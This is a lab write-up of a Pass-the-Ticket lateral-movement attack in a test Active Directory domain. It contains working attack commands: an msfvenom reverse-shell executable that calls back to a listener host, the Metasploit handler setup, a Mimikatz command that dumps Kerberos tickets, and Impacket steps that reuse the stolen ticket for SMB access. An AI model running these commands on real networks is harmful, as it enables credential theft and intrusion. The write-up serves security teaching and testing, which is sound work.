Network Diagram

Diagrama sin título.drawio.png

Laboratory Setup

The lab consists of an Active Directory environment configured with the following parameters.

Users

The following user accounts have been added to the domain structure:
6d72a660ff3a233a7c153ba8c619e58a.png

Explotation phase

Since Pass-the-Hash is a lateral movement technique, we require an established shell with administrative/system privileges on one of the network endpoints.
I will establish an interactive meterpreter session. To achieve this, I generate a malicious executable using msfvenom which will subsequently be executed by the user manuel.

msfvenom -p windows/x64/meterpreter_reverse_tcp LHOST=172.25.100.35 LPORT=4444 -f exe -o virus.exe

8eccc8e618cdb21365a4dd9beea2ab16.png
045f509721d3ec9cda5b68d27aee325d.png
We initialize the Metasploit multi-handler payload listener:

use exploit/multi/handler
set PAYLOAD windows/x64/meterpreter_reverse_tcp
set LHOST 172.25.100.35
run

1c00a3d309d13553bc812044e8406313.png

NOTE
Since we already hold valid credentials, executing a binary payload is not strictly necessary. We could pivot laterally using RDP or tools within the Impacket suite. However, because meterpreter includes the Mimikatz suite via the kiwi extension natively, I opted for this approach for convenience.

Note that this terminal session runs with Windows SYSTEM privileges, accurately replicating a scenario where an initial endpoint has been completely compromised, and the threat actor aims to pivot across the infrastructure.

Pass-the-Ticket (PtT)

This is a post-exploitation lateral movement technique where an attacker targets valid Kerberos tickets (TGTs or TGSs) already cached in memory on a compromised system running as SYSTEM to impersonate that user across domain assets.

We extract the target Kerberos tickets directly out of memory:

kiwi_cmd sekurlsa::tickets /export

571b73aa7645ba048921554e04bb6857.png
We save the exported base64 payload into a file structure. This token can then be utilized from meterpreter, a secondary Windows machine, or via Impacket.

kerberos_ticket_use |===|Path_to_ccache|==|

da2fc30895fcaf5f6b151d7e13a48b65.png
To manipulate this token outside of Kiwi, we replicate the conversion pipeline:

cat manuel.base64 | base64 -d > manuel.kirbi
impacket-ticketConverter manuel.kirbi manuel.ccache
export KRB5CCNAME=$(pwd)/manuel.ccache

In this demonstration, we use the session token to list network SMB resources:

impacket-smbclient -k -no-pass AROCHE.LOCAL/manuel@win-lgsoqdrpjqu.aroche.local

9793ec97c93466f908b9d79a9fb1a373.png